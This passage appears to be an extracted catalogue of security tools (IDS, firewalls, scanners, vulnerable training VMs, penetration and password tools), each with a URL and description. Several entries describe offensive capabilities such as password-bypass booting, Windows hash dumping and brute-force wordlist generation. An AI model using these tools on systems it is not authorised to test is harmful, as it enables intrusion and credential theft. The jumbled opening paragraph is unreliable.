autohacks. Also not forgetting that winAUTOPWN unlike other frameworks maintains the origin al exploit writer's source code intact just as it was and uses it.TXT) . Metasploit Framework (free ware). The source is modified on ly when required to enable a missing feature or to remove hard-coded limitations . Newer exploit modules are added as and when they release and older ones are also being daily added. Binaries of perl.Doesn't require any Database at the back-end like others . quick. Some anti-viruses might falsely detect the exploits as malicious. standalone appli cation which is easy to use and doesn't require a lot of support of other depend encies. Under these circumstances also. python and cygwin DLLs (included) are required to exist e ither in a common folder or should be properly installed with their paths regist ered for those exploits which are cannot be compiled into a PE-exe. This way the exploit writer's credit and originality is maintained. but to create a free.nr/ Autohack your targets with least possible interaction. winautopwn http://winautopwn. script or compile the source codes. . the exploit writer's credits remain intact.Launched exploits are independent and don't rely on service fingerprinting (to avoid evasion.Contains already custom-compiled executables of famous and effective exploits alongwith a few original exploits. quick. php. Immunity Canvas.

. provided that you have root per missions.Easily configurable via command line switches.pdf OWASP Testing Guide http://www. .It manages the network interface into unplug.It replaces Arpwatch & co.org/papers/cheatsheets/Wireshark_Display_Filters. in fact you can disable the daemon in order to use the tools to poison the ARP Cache.owasp.It works in userspace for OS portability reasons. . .html ArpON (Arp handler inspectiON) is a portable handler daemon that make Arp secure in order to avoid Arp Spoofing/Poisoning & co.pdf Wireshark Display Filters http://packetstormsecurity. hibernation and suspension OS features. .sourceforge.Tested against Ettercap. ArpON http://arpon.googlecode. dsniff and other tools.http://packetstormsecurity. ArpON does it using SA RPI and DARPI policies. Remember it doesn't affect the communication efficiency of the ARP protocol! . Finally you can use ArpON to pentest some switched/hubbe d LAN with/without DHCP protocol. the first is b ased on SARPI or "Static Arp Inspection".org/papers/cheatsheets/common-ports.pdf NMAP http://sbdtools. .It detects and blocks Arp Poisoning/Spoofing attacks in statically configured networks. the second on DARPI or "Dynamic Arp In spection" approach.com/files/hping3_cheatsheet_v1.mertsarica. . This is possible using two kinds of anti Arp Poisoning tecniques. boot.net/index.com/files/Nmap5 cheatsheet eng v1.It detects and blocks Arp Poisoning/Spoofing attacks in dinamically configured (DHCP) networks.pdf Defensive Anti Meterpreter http://www.org/images/5/56/OWASP_Testing_Guide_v3.com/codes/antimeter.zip Antimeter is a very useful tool for internal security administrators who can sca n their systems for meterpreter session remains after they have successfully exp loited any system with Metasploit.0-ENG. ArpON blocks. Keep in mind other common tools fighting ARP poisoning usually limit their activ ity only to point out the problem instead of blocking it. Firewall . Cain & Abel.pdf Hping http://sbdtools.It detects and blocks unidirectional and bidirectional attacks.googlecode.

net/download GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks.com/?Patriot_NG Patriot is a 'Host IDS' tool which allows real time monitoring of changes in Win dows systems or Network attacks. It has a powerful correlation and analysis engine. real-time repo rts for hardware. configuration back up & restore.Networking: Internet Router. e. setup wizard. * The virtual appliance can be run directly in any VMware vSphere Edition Running an Astaro Security Gateway within a virtual machine protects your enviro nment twice: * External communication . inter .net/main/ OSSEC is a scalable.Defense against threats from the Internet. automatic QoS .com/landingpages/en-worldwide-essential-firewall The Essential Firewall edition provides protection for unlimited IP addresses an d the following features without any time limitations: . Both versions offer the identical feature set and include a hardened linux ope rating system. open source Host-based Intrusion Detection System (HIDS). searching.Controls and monitors data traffic between virtual ma chines GreenSQL http://www. Patriot NG http://www. integrating lo g analysis.g. Bridging.Astaro Security Gateway http://www. daily executive reports . file integrity checking. administrator notifications. DynDNS. * The software appliance can be either installed on a dedicated Intel™-compatible PC or within a virtual machine. rootkit detection. IDS/IPS Ossec http://www. DNS server & proxy. Patriot monitors: * Changes in Registry keys: Indicating whether any sensitive key (autorun. real-time alerting and active response. Windows registry monitoring. centralized management via Astaro Command Center (also free of charge) Which Platforms are Supported by the Essential Firewall Edition? The Essential Firewall software is available as a software and virtual appliance .Logging/Reporting: Full logging on local hard drive. DHCP server & relay.ossec. GreenSQL works as a proxy for SQL commands and has built in s upport for MySQL.astaro.Management: Web-based GUI in local languages. centralized po licy enforcement.security-projects.Network Security: Stateful Packet Inspection Firewall & Network Address transl ation (DNAT/SNAT/Masquerading) . network usage and network security.greensql. NTP support. Troja ns and viruses * Inter-VM communication . SNMP support. multi-platform.Remote Access: PPTP and L2TP over IPSec support (including iPhone support) .

It enables the administrator to browse client mes sages.openinfosecfoundation. The HTP Library is an HTTP normalizer and parser written by Ivan Ristic of Mod S ecurity fame for the OISF. detection of rogue SUID executables. About Beltane Beltane is a web-based central management console for the Samhain file integrity / intrusion detection system..) * Files in critical directories (New executables. but will bring new ideas and technologies to the fie ld. as well as a list of our current Consor tium Members. The Suricata Engine and the HTP Library are available to use under the GPLv2. More inform ation about the Consortium is available. and hidden processes. Samhain been designed to monitor multiple hosts with potentially different opera ting systems. The HTP library is required by the engine.de/samhain/ The Samhain host-based intrusion detection system (HIDS) provides file integrity checking and log file monitoring/analysis.exe / Internet Explorer using OLE objects) * Netbios connections to the System * ARP Watch (New hosts in your network) * NIDS (Detect anomalous network traffic based on editable rules) Suricata http://www. new toolbars) * Changes in ARP table (Prevention of MITM attacks) * Installation of new Drivers * New Netbios shares * TCP/IP Defense (New open ports. PortScan de tection. This integrates and provides very advanced processing of HTTP streams for Suricata..net explorer settings. providing centralized logging and maintenance.. but ma y also be used independently in a range of applications and tools. configuration cha nges. although it can als o be used as standalone application on a single host. * New files in 'Startup' directories * New Users in the System * New Services installed * Changes in the hosts file * New scheduled jobs * Alteration of the integrity of Internet Explorer: (New BHOs. acknowledge them. the file signature databas e need only be up to date when the daemon restarts and downloads the database fr . new connections made by processes.. samhain http://la-samhna..) * New hidden windows (cmd. as well as thro ugh the very generous support of the members of the OISF Consortium. as well as rootkit detection. and update centrally stored file signature databases. As the Samhain daemon keeps a memory of file changes.php/downloads The Suricata Engine is an Open Source Next Generation Intrusion Detection and Pr evention Engine.org/index.. port m onitoring. OISF is part of and funded by the Department of Homeland Security's Directorate for Science and Technology HOST program (Homeland Open Security Technology).) is altered. new DLLs. This engine is not intended to just replace or emulate the exis ting tools in the industry. by the the Navy's Space and Naval Warfare Systems Command (SPAWAR).

It can be used to effectively secure networks .NET Framework requirements * Runs as a Windows Service at low priority so users do not see or feel it * Resumes automatically upon system reboot with no user interaction * Securely transmit results to web application at user-defined intervals over tw o-way-trusted SSL connection * Uses PCREs to identify sensitive data inside files * Performs additional checks on potential credit card numbers to reduce false po sitives scannedonly . Web Application * Automatically deploy and start agents over Netbios * When done.snorby.html PacketFence is a free and open source network access control (NAC) system.packetfence. OpenDLP has two components: a web application and an agent. and forcefully uninstall agents in an entire scan or on individ ual systems * Concurrently and securely receive results from hundreds or thousands of deploy ed agents over two-way-trusted SSL connection * Create Perl-compatible regular expressions (PCREs) for finding sensitive data at rest * Create reusable profiles for scans that include whitelisting or blacklisting d irectories and file extensions * Review findings and identify false positives * Export results as XML * Written in Perl with MySQL backend Agent * Runs on Windows 2000 and later systems * Written in C with no . centrally-managed.org/en/home.google.om the central server. massively dis tributable data loss prevention tool released under the GPL. Packe tFence is actively maintained and has been deployed in numerous large-scale inst itutions over the past years. Given appropriate W indows domain credentials. Beltane allows you to use the information logged by the c lient in order to update the signature database. OpenDLP can simultaneously identify sensitive data at rest on hundreds or thousands of Microsoft Windows systems from a centralized w eb application. snorby http://www. and delete agents over Netbios * Pause. uninstall.org Snorby is a new and modern Snort IDS front-end. ope n source and highly competitive application for network monitoring for both priv ate and enterprise use. agent-based. automatically stop. NAC PacketFence http://www.com/p/opendlp/ OpenDLP is a free and open source. The project goal is to create a free. resume. The basic fundamental concepts b ehind snorby are simplicity and power. opendlp http://code.fr om small to very large heterogeneous networks.

The daemon scans files.5.virus:. and what is still ahead . helpdesk. The samba vfs module will also tell the daemon to scan this file.com/ Spiceworks is the complete network management & monitoring. The first time a directory is listed. If this is the case. If a certain file is clean. the fi le is not returned in any directory listing. It will work with m . So what happens for the user.sessink. but after a first refresh all files are shown.scanned:. Drad is is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far.http://olivier. and cannot be opened.0) and (one or more) daemons. PC invento ry & software reporting solution to manage Everything IT in small and medium bus inesses. Spiceworks Lets You. The samba module simply looks if such a . Management Content Dradis Framework http://dradisframework.. * Organizations with less than 500 devices on their network.virus: prefix are never shown to the us er and all access is denied. If this is not the case. Network Spiceworks http://www. a warning is sent to the logs. and is newer than the pertinent file.. There is a utility scannedonly_p rescan that can help you to prescan all directories. If a virus is found by the daemon. a second file is created with prefix .nl/scannedonly/ Scannedonly is a samba VFS module and a scanning daemon that ensure that only fi les that have been scanned for viruses are visible and accessible to the end use r. it is empty.spiceworks. Scannedonly comes in two parts: a samba vfs module (included in samba since samb a-3.scanned: file exists. * * * * * * * * * * Inventory Your Network & PCs Monitor & Manage Your Network Manage Your IT Assets Manage Changes & Configurations Map Your NetworkBETA Audit Your Software Troubleshoot Your Network Run an IT Help Desk Be an MSP Talk to IT Pros Like You Spiceworks IT Desktop is designed for * IT Pros who have admin rights on their network. and the file is renamed to have prefix . Files with the .org/ Dradis is an open source framework to enable effective information sharing. the file is shown to the user. a file with a warning message is created in t he directory of the user.

lansweeper http://www. vulnerability analysis. and much more. navigation. security testing..com/ Lansweeper: hardware.php. It discovers Windows. Forensics and Honey Pots.lansweeper. * Running on a PC.hackfromacave.net/projects/lampsecurity/ LAMPSecurity training is designed to be a series of vunlerable virtual machine i mages along with complementary documentation designed to teach linux. Password Cracking. network and software inventory for windows networks Lansweeper is an automated network discovery tool which scans all your computers and devices and displays them in an easy accessible web interface.com/ The Matriux is a phenomenon that was waiting to happen. NST also makes an excellent tool to help one with crash recovery troubleshooting scenarios and diagnostics. Katana includes distributions which focus on Penetration Testing. Auditing. automation and configuration of many network and security applic ations found within the NST distribution.” OWASP Broken Web Applications Project http://code. There is no need to install any agents on the computers.matriux. NST can be used as a network security analysis.ore but it won’t be as fast. The idea behind this tool is to bring together all of the best security distributions to run from one USB drive. ssh. Network Security Toolkit http://sourceforge. but not limited to. OS X. all scanning is done by standard build-in functionality (wmi.) OS Distro Katana http://www.google. An advanced Web User Interface (WUI) is provided for system administrati on. It is a fully featured s ecurity distribution consisting of a bunch of powerful. In the virtual world.html Katana Is a portable multi-boot security suite designed for many of your compute r security needs.net/projects/nst/ “The Network Security Toolkit (NST) is a bootable ISO live CD/DVD (NST Live) and i s based on Fedora. validation and monitoring tool on enterprise vir tual servers hosting virtual machines. system and network administration. LAMPSecurity http://sourceforge. The toolkit was designed to provide easy access to best-of-br eed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. although it can be used normally as your default desktop system. ethical hacking. snmp. Linux and Unix but you need to ru n it from a PC on your network. mysql security.com/p/owaspbwa/wiki/Downloads . cyber forensics investigations.apache.com/katana. open source and free too ls that can be used for various purposes including. Matriux http://www. penetrat ion testing... It is a distribution designed for security enthusiasts and professionals.

http://sourceforge. Qubes utilizes virt ualization technology. this CD-sized distro contains all the tools you need to test your skills and excel in the field of IN FOSEC.too ls.pentoo. but at the same time they are well isolated fr om each other.org/ Qubes implements Security by Isolation approach. Convenient virtual machine image (VirtualBox recommended. E.php Web Security Dojo A free open-source self-contained training environment for Web Application Secur ity penetration testing. VMware provided) Targets include: * OWASP's WebGoat v5. “work”. to be able to isolate various programs from each other. To do this.10. and documentation. Why? The Web Security Dojo is for learning and practicing web app security testing te chniques. We have collected the top testing tools and pre-installed them to build the pe rfect environment for testing applications. It is ideal for training classes and conferences since it does not nee d a network connection.g.com/dojo. “bank”. user can have “personal”.com/main/ “A must-have for anyone interested in Security or Forensics. “shopping”. or “AppVMs”.org) Web Security Dojo http://www. of course. a collection of vulnerable web applications that is distributed on a Virtual Mach ine in VMware format compatible with their no-cost VMware Player and VMware Serv er products (along with their commercial products). Qubes lets the user define many security domains implemented as lightweight Virt ual Machines (VMs). Tools + Targets = Dojo What? Various web application security testing tools and vulnerable web applications w ere added to a clean install of Ubuntu v9.mavensecurity.net/projects/owaspbwa/files/ Pentoo http://www.2 . Qubes supports secure copy-and-paste and file sharing between the AppVMs. Samurai http://sourceforge. targets.ch/ Qubes http://qubes-os. like networking or storage subsyst em. WeakNet Linux http://weaknetlabs. so that their compromise don’t affect the integrity of the rest of the system.Open Web Application Security Project (OWASP) Broken Web Applications Project.net/projects/samurai/files/ The Samurai Web Testing Framework is a LiveCD focused on web application testing . a m” AppVMs and can use the applications from within those VMs just like if they wer e executing on the local machine.” – Johnny Long (iHackCharities. a nd even sandbox many system-level components. The Dojo contains everything needed to get started .

0 RC1 Paros v3. The aim of Buck Security is.0 simple training targets by Maven Security (including REST and JSON) Tools: * * * * * * * * * Burp Suite (free version) v1.but also as a normal linux user . By now the following tests are implemented: * Searching for worldwriteable files . to allow you to get a quick overview of the securit y status of your system. It runs important tests and returns th e results to you after a couple of minutes. create an audit trail and r eporting.0 OWASP InsecureWebApp v1. but can be useful for any Linux system.6 Hacme Casino v1. For Windows systems it allows to enter any password protected profile wit hout any knowledge of the password.* * * * Damn Vulnerable Web App v1.57-beta sqlmap v0. In the current compilation state it allows to log into a linux system as 'root' user w ithout typing the correct password or to elevate privileges from current user to root.13 Webscarab v20070504-1631 Ratproxy v1.net/index. Agnitio aims to replace the adhoc nature of manual security code review documentation. Features * * * * Security code reviews Security code review metrics and reporting Application security code review tool Static analysis security guidance and reporting Buck Security http://buck-security.0. Others Agnitio http://sourceforge.you often wonder if your system is secure.6. As a linux system administrator .com/all/kon-boot/ Kon-Boot is an prototype piece of software which allows to change contents of a linux kernel (and now Windows kernel also!!!) on the fly (while booting).piotrbania. In this situation it is useful to get an overvirew of the security status of the system immediately.sourceforge.2a OWASP Dirbuster v1.html Buck Security is a collection of security checks for Linux.3 w3af cvs version OWASP Skavengerv0.2. It was designed for Debian and Ubuntu servers. Buc k Security was designed exactly for this.net/projects/agnitiotool/ A tool to help developers and security professionals conduct manual security cod e reviews in a consistent and repeatable way.7 helpful Firefox add-ons kon-boot http://www.

* * * * * * * Searching for worldwriteable directories Searching for programs where the setuid is set Searching for programs where the setgid is set Checking your umask Checking if the sticky-bit is set for /tmp Searching for superusers Searching for installed attack tools packages CERT Basic Fuzzing Framework http://www. It is meant specifically to locate likely targets both inside and outside a corp orate network. * VMware Tools is installed. which prevents symbols from being removed whe n an application is built. * Memory randomization is disabled. * The OS is configured to automatically log in and start X.html The Basic Fuzzing Framework (BFF) consists of two main parts: * a Linux virtual machine that has been optimized for fuzzing * a set of scripts and a configuration file that orchestrate the fuzzing run The virtual machine is a stripped-down Debian installation with the following mo difications: * The Fluxbox window manager is used instead of the heavy Gnome or KDE desktop e nvironments. It was chosen for its deterministic behavior. Crunch http://sourceforge. and lightweight size. * strip is symlinked to /bin/true. Only those targets are listed (unless the -nopattern switch is us ed).net/projects/crunch-wordlist/ Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. which allows the guest OS to share a directory with the host. * sudo is configured to not prompt for a password. Fierce is not an IP scanner. The fuzzer used by the BFF is Sam Hocevar's zzuf application. it is not a DDoS tool. it is not designed to scan the whole internet or perform any un-targeted attacks. This can help in situ ations where you may need to interact with the guest OS while a GUI application is being fuzzed. number of features.org/fierce/ First what Fierce is not. No exploitation is performed (unless you do something intentionally malicio us with the -connect switch). Fierce is a Perl .cert.org/download/bff/d.ckers. Features: * * * * * * crunch generates wordlists in both combination and permutation ways it can breakup output by number of lines or file size now has resume support pattern now supports number and symbols pattern now supports upper and lower case characters separately adds a status report when generating multiple files Fierce http://ha. * Fluxbox is configured to not raise or focus new windows. Fierce is a reconnaissance tool. crunch can generate all possible combinations and permutations.

plus a list of potential usernames very useful for preparing a bruteforce attack on ope n services like ftp. ne twork names. In other wo rds.doc. SQL injection. templates. etc in your endeavors. such as denial-of-service.com/metagoofil. Fiddler. information d isclosure. It can teach you ho w to attack an application using common web security vulnerabilities. So you can show them what information an attacker can obtain.html HashGrab2 automatically mounts any Windows drives it can find.com/rsmangler-security-tool. Jarlsberg http://jarlsberg.appspot. Also it will extract a lis t of disclosed PATHs in the metadata.net/hacking-tools-utilities/2538-hashgrab-py-automatically -get-windows-login-hashes.script that quickly scans domains (usually in just a few minutes.. but most of the compani es doesn't have policies about information leaking. like cross -site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF).ppt. it first teaches you how hacking works and then it lets you attack itself w ith those attacks! This is how hands on learning should be! Google likes to describe Jarlsberg as a cheesy web application that was intentio nally built with a number of vulnerabilities. AJAX.xls.. Shared resources.com/ Jarlsberg is a collection of codes.ods) availables in the target/victim websi tes. Watcher. with this simple technique. It can also teach you how to find. etc. It gives you a brief de scription about a vulnerability and then you have the task of exploiting this vu lnerability! Simple as that! You are allowed to use your favourite tools such as Burp Proxy. RSMangler http://www. vpn.php Metagoofil is an information gathering tool designed for extracting metadata of public documents (pdf. etc. assuming no ne twork lag) using several tactics. The only pre-requisite is that you should have a general understanding as to how a web application works and some knowledge about HTML. This new version extracts MAC address from Microsoft Office documents. fix. MetaGooFil http://www. after which it writes them to user specified directory. HashGrab2 http://forum. and using samdump 2 extracts username-password hashes from SAM and SYSTEM files located on the Win dows drive. The main new feature is permutations mode which takes each word in the list and . Python (since it is written in P ython).php RSMangler will take a wordlist and perform various manipulations on it similar t o those done by John the Ripper with a few extras. You play the role of a hacker in this test. cookies. with this information you can guess OS. Now you c an have an idea of what kind of hardware they are using.randomstorm. pop3.web applications. that shows how web application vulnerabiliti es can be exploited and how to defend against these attacks. and most of them don't kno w this information exists. and avoid these common vulnerabilities and other bugs that have a security impact. browser phishing or remote code execution. It will generate a html page with the results of the metadata extracted. etc.edge-security.intern0t. All this information should not be available on the net.odp.

foundstone. because of this we strongly recommend with permutations mode enabled (default) you use a very smal l wordlist. VIDigger is intended to be used throughout the deployment lifecycle both as a hardening tool and a change tracking tool that brings configuration settin gs changes to the attention of the administrator. Vicnum http://sourceforge. Being a small web application with no complex framework involved. Though the core technology of VMware is designed to b e secure. 3 start words create a final list containing 4245 words and 5 start words creates a list containing 91975.htm VIDigger is a tool designed to help VMware Virtual Infrastructure administrators harden their environment. The tool focused on changes th at may impact the overall security of the ESX host or virtual machine(s) deploye d on the ESX host. Vicnum can eas ily be invoked and tailored to meet a specific need. sql injections. One of the most exciting features of VIDigger is that it can be extended to add new checks as new components are added to the virtual infrastructure not current ly scanned by the tool. For example the words freds. For example if a test vulne rable application is needed in evaluating a web security scanner or a web applic . As a test we tried it with a few hundred words and gave up when the output file got to 3G. there are many configuration settings and deployment considerations th at can severely impact the overall security of the deployed Virtual Infrastructu re. order matters). VIDigger is designed to help administrators check the configuration of ESX s erver and the virtual machines hosted on ESX server against the VMware Infrastru cture Hardening guide and other best practices. fish will produce the fo llowing list: freds fresh fish fredsfresh fredsfish freshfreds freshfish fishfreds fishfresh fredsfreshfish fredsfishfresh freshfredsfish freshfishfreds fishfredsfresh fishfreshfreds Each of these new words is then subject to the other mangles.combines it with the others to produce all possible permutations (not combinatio ns.net/projects/vicnum/ Vicnum is a flexible and vulnerable web application which demonstrates common we b security problems such as cross site scripting. fresh. VIDigger will retrieve configuration data about the host and virtual machines an d then deliver a customizable report of problematic areas to the Virtual Adminis trator. The program is especially useful to IT auditors honing web secu rity skills and setting up ‘capture the flag’ type exercises.com/us/resources/proddesc/vidigger. VIDigger http://www. and session ma nagement issues.

Operates under Unix. SNMP infor mation.9. Features an automat ic (scriptable) working mode. you might want to control a target web application to see what t he scanner can find and what the firewall can protect. developers. TFTP. Ultimately the major goal of this project is to strengthen security of web appli cations by educating different groups (students.2a is the final release. NetBIOS informations and Windows shares. Performs exhaustive XSS tests 5. protocols.google. and SMTP pr otocols). Xplico isn’t a network protocol analyzer. It does not only scans IPv4 addresses . Linux. all good things have to come to an end and so it goes for SARA . Performs SQL injection tests. For example. Standalone or daemon mode 12. IMAP. MAC OS/X or Windows (through coLinux) OS'. SARA 7. a hunt mode. Support remote self scan and API facilities. management. s tarting from the Layer 2 of the OSI model. each VoIP call (SIP).9. IPv4 and IPv6 network scanner with 31 scan methods: it scan s for open ports. and so on. FTP. and WMI (WBEM) information. 6. And of course it’s OK to have a little fun. sara http://www-arc. CVE standards support 10.com/sara/ The Security Auditor's Research Assistant (SARA) is a third generation network s ecurity analysis tool that that has been available and actively updated for over 10 years. Sadly. Free-use open SATAN oriented license xplico http://www.xplico. Enterprise search module 11. users. 4. 2. Actually. * CHScanner has a lot more scanning methods compared with many other scanners. 3. Integrates the National Vulnerability Database (NVD).ation firewall.com/p/chscanner/ CHScanner is an ARP. all HTTP contents. Xplico is an open source Network Forensic Analy sis Tool (NFAT). a passive mode and the normal scannin g mode. Some details The main differences between CHScanner and other similar tools are: * CHScanner use an Operating System Mimic Technology. SARA-7. from a pcap file Xplico extracts each email (POP. Used for CIS benchmark initiatives 8. auditors) as to what might go wrong in a web app.org/ The goal of Xplico is extract from an internet traffic capture the applications data contained. Scanner CHScanner http://code. 7. SARA: 1. It also have the ability to turn on (using W ake-On-LAN) and to shutdown or reboot a remote Windows host.1 is our last release. Can adapt to many firewalled environments. Plug-in facility for third party apps 9.

in this mode CHScanner will scan a ny host that tries to communicate with the host machine. unlike a traditional packet sniffer it doesn’t attempt to capture and decode all traffic bu t instead is geared toward discovering useful infrastructure and security-relate d data from the network. By using geolocation data provided by MaxMind you can find the country associate d with a specific IPv4 Address. The Solaris 8 emulation may not be continued and emulation for Op enSolaris (Nevada 35) may be added. save the result and close. hostnames.9. and quite fast. general broadcast network traffic. * Besides the skinnable graphical interface. CSniffer http://download.mcafee. routers and name servers.Using Windows’ built-in raw sockets API (default). scriptable. * It is very flexible.2.Using the WinPcap packet driver. this means that the packets it sends emulates the behavior of various operating systems and/or their native tools (where is the case). ICMP ECHO Request. CHScanner only listen to the net work traffic and decodes the packets received. IPv6 and some higher level protocols like NetBIOS. Scanning modes * Normal mode: this is the common mode used by most of the scanners today. * Passive mode: in this mode NO packet is sent. IGMP. user names and passwords. Tool requirements CSniffer runs on Microsoft Windows systems (Windows 2000 upwards) and attempts t o sniff network data in promiscuous mode.exe This tool acts much like a standard Ethernet network sniffer.6 (Fedora Core based) Solaris 8 OpenSolaris (Nevada 35) There is also a "random" mode where the packets have the identification data ran dom generated. often from traffic not sent to or from the host system i.4 (Adamantix based) Linux kernel 2. Currently it e mulates the following : * * * * * * Windows XP Professional SP2 Windows 2003 Server Linux kernel 2. Operating System Mimic Technology short description Basically. TCP SYN. This data can reveal all manner of usefu l information.. . CHS canner will do his job based on the configuration file supplied as one of the pa rameters. .e. it also uses ARP. * Hunt mode: introduced with version 0. similar to a sniffer. ranging from live systems on the network. SNM P and WMI. The scan is triggered b y received one of the following packets destined to the local machine: ARP Reque st.com/products/tools/csniffer/csniffer. mode: if instructed so. * Automatic.7. CHScanner can be used from command line to automate the scans. However. It can use one of two methods to achie ve this: . by command line parameters. Ipv6 systems . scanning being done based on user defined configuration f iles.

* REDUNDANT FIREWALL RULES may be complicating your configuration and slowing yo u down. * LAX CONTROLS ON DMZs may expose staging and test servers. SP specific).On Windows XP Sp1. * ERADICATE LATENT SECURITY PROBLEMS lurking in overly-permissive rules * SANITY CHECK CHANGES to see if new rules create problems. but here are some known issues. only UDP packets are captured. What You Can Do With Flint CHECK RULES BEFORE DEPLOYING THEM Flint prevents engineers from making costly mi stakes. and not always at the same time. . .Limitations Other than the aforementioned requirements of running under an administrator lev el account. this only applies to Windows raw sockets mode. CLEAN UP RUSTY RULESETS Flint does the hard work of scouring firewall rules for useless crud.com/p/11 Flint examines firewalls. Again. People aren't good at thinking like firewalls. and . saving you time and allowing your team to focus on engineering pro blems that really matter. XP Sp3 and Vista no outgoing packets of any kind are captur ed.On Windows Vista with Sp1. Firewalls can get out of step with policie s. you have to re ad hundreds of configuration lines. no drama. * FIREWALL MANAGEMENT PORTS may be exposed to untrusted networks. A comprehensive list of all known limitations seen on different Windows operating systems and se rvice pack levels of those operating systems has not been compiled. quickly computes the effect of all the configuration r ules. Some of those mistakes can be expensive: * INSECURE SERVICES might be allowed through the firewall.Outgoing UDP and ICMP packets are not captured (OS. and then you have to think like a firewall d oes. Why you need Flint You have multiple firewalls protecting internal networks from the Internet and c ontrolling access to customer data. Flint http://runplaybook. To understand a firewall configuration. Your business changes. there are some severe limitations when using the built-in Windows ra w sockets mode. It takes just moments for Flint to evaluate a ruleset and spot errors. Flint can spot redundant and contradictory rules. So most firewalls are riddle d with subtle mistakes. Everybody makes mistakes. Y our team can have it up and running in minutes. and so do your firewa lls. . TCP packets are not captured. preventing it from bl ocking attacks. Flint is low-drag. Depending on what platform you are running on you may fin d that you are limited in what data can be seen on the network. The Microsoft raw sockets API has several restrictions that have been introduced over the years in an effort to reduce security risks associated with low level network packet access. and then spots problems so you can: * CLEAN UP RUSTY CONFIGURATIONS that are crudded up with rules that can't match traffic.

microsoft.com/index.org/nessus/ The Nessus® vulnerability scanner is the world-leader in active scanners.IT Security Auditors evaluate the risk of a particular piece of software insta lled on the Windows platform during threat risk reviews .aspx?FamilyID=b1e76bbe-71df-41e8-8b52 -c871d012ba78&displaylang=en The Microsoft Baseline Security Analyzer provides a streamlined method to identi fy missing security updates and common security misconfigurations. It also fully understands the meanings of configuration lines.aspx?FamilyID=1283b765-f57d-4ebb-8 f0a-c49c746b44b9&displaylang=en&pf=true#Overview Attack Surface Analyzer is the same tool used by Microsoft's internal product te ams to catalogue changes made to the operating system by the installation of new software. The tool scans an IP addr ess and tries to retrieve shared disks and their content. COMPREHEND COMPLEX CONFIGURATIONS Flint doesn't just check firewalls for problem s.com/labs/plecost/ .iniqua.IT Professionals to assess the aggregate Attack Surface change by the installa tion of an organization's line of business applications . inside DMZs and across physic ally separate networks. It works for Windows w orkstations/servers as well as for Linux boxes (smbclient used for login). configuration auditing.1 is a minor upgrade to add support for Windows 7 and Windows Server 2008 R2. so you can see at a glance what any g iven firewall is doing. MBSA 2. How to get Flint Flint is distributed in source form. Attack Surface Analyzer takes a snapshot of your system state before and after t he installation of product(s) and displays the changes to a number of key elemen ts of the Windows attack surface. Netbios-shares-scanner http://www.IT Security Incident Responders to gain a better understanding of the state of a systems security during investigations (if a baseline scan was taken of the s ystem during the deployment phase) Microsoft Baseline Security Analyzer http://www. It is implemented in ruby.aldeid. sensitive data discovery and vulnerability analysis of your security posture.microsoft. Microsoft Attack Surface Analyzer http://www. asset profiling.com/downloads/details.Developers to view changes in the attack surface resulting from the introducti on of their code on to the Windows platform . and breaks the m down for you by service or by interface.php/Netbios-shares-scanner Netbios Shares Scanner has been developed by SecPoint. This allows: . Nessus scanners c an be distributed throughout an entire enterprise.Flint makes it easier to spot business-level problems. Nessus http://www.com/downloads/en/details. featurin g high-speed discovery. Plecost http://www.nessus.1.

user-defined function code by mouse-over on detected call . LFI/RFI. Features of RIPS: .Wordpress finger printer tool search and retrieve information about the plugins versions installed in Wordpress systems. user address books. This open source tool is programmed in Perl and has several modules that focus o n almost 28 devices in all! The module to be used is enumerated from the differe nt models of printers using “Title page” and “Server type” responses from the printer ma nagement page. RCE vulnerabilities and more . they could also aid you in remote retrieval of prints. etc.5 verbosity levels for debugging your scan results . scan copies! Certain printer installations could also allow you to access the HTTP interface. LDAP passwords.net/projects/rips-scanner/ RIPS is a static source code analyser for vulnerabilities in PHP webapplications . Additionally displays CVE code associated with each plugin.net/?page_id=218 http://www. Email. SQLi.net/?p=223 By taking advantage of poor printer security and vulnerabilities during penetrat ion testing we are able to harvest a wealth of information from MFP devices incl uding user-names.mark vulnerable lines in source code viewer . File disclosure. RIPS automates the process of identifying potential security flaws in PHP source code by using static source code analysis. It can analyze a single URL or perform an analysis based on the results indexed by Google. email addresses. if there.list of all user-defined functions and program entry points – (user input) conne cted to the source code viewer .foofus.pl TARGET_FILE TCP_PORT PROJECT_NAME OUTPUT_FILE RIPS http://sourceforge. faxes.only minimal requirement is a local webserver with PHP and a browser Seccubus . authentication informatio n including SMB. and make a configuration cop y! This could allow you to further see the internals! In short. Its required Perl modules are: LWP::Simple LWP::UserAgent HTML::TagParser URI::Fetch HTTP::Cookies Sample syntax: praeto. PRAEDA is design ed to automate some of the information gathering from network appliances through web-management interfaces such as printers and network appliances. Sometimes. Praeda http://www.create CURL exploits for detected vulnerabilities with few clicks .foofus.7 different syntax highlighting colour schema .detect XSS.

It supports remote shutdown and Wake-On-LAN. SoftPerfect Network Scanner http://www. * Detects hardware MAC-addresses. It is intended for both sy stem administrators and general users interested in computer security. The progr am pings computers. FreeBSD. active web application security reconnaissance tool. Compare results o f the current scan with the previous scan and report on the delta in a web inter face.google. capable of spotting a range of subtle flaws. SoftPerfect Network Scanner can also check for a user-defined port and report back if one is open. highly optimized HTTP handling. The tool is believed to support Linux. file system and service manager. on-the-fly wordlist cr eation.net/projects/seccubus/ Tool to automatically fire regular security scans with Nessus. * Detects hidden shared folders and writable ones. with automatic learning capabilities.easily achieving 2000 requests per second with responsive targets. NetBIOS and SNMP scanne r with a modern interface and many advanced features. configured user accounts. and Windows (Cygwin) en vironments. CSV and TXT * Supports Wake-On-LAN. * Scans for listening TCP ports. * Retrieves information from remote registry.nibblesec. * It is absolutely free. * Retrieves potentially any information via WMI.com/products/networkscanner/ SoftPerfect Network Scanner is a free multi-threaded IP. Key feat ures: * High speed: pure C code. and does not contain any adwa re/spyware/malware. etc. Vasto http://vasto. it allows you to mount shared folders as network drives.org/ . MacOS X. * Ease of use: heuristics to support a variety of quirky web frameworks and mixe d-technology sites. some UDP and SNMP services.com/p/skipfish/ A fully automated.http://sourceforge. Main objective of the tool is to make repeated scans more efficient SkipFish http://code. Key features * Pings computers and displays those alive. * Cutting-edge security logic: high quality. scans for listening TCP/UDP ports and displays which types o f resources are shared on the network (including system and hidden). differential se curity checks. and form autocompletion. filter the results list and more. requires no installation. XML. minimal CPU footprint . * Can launch external third party applications. I t can 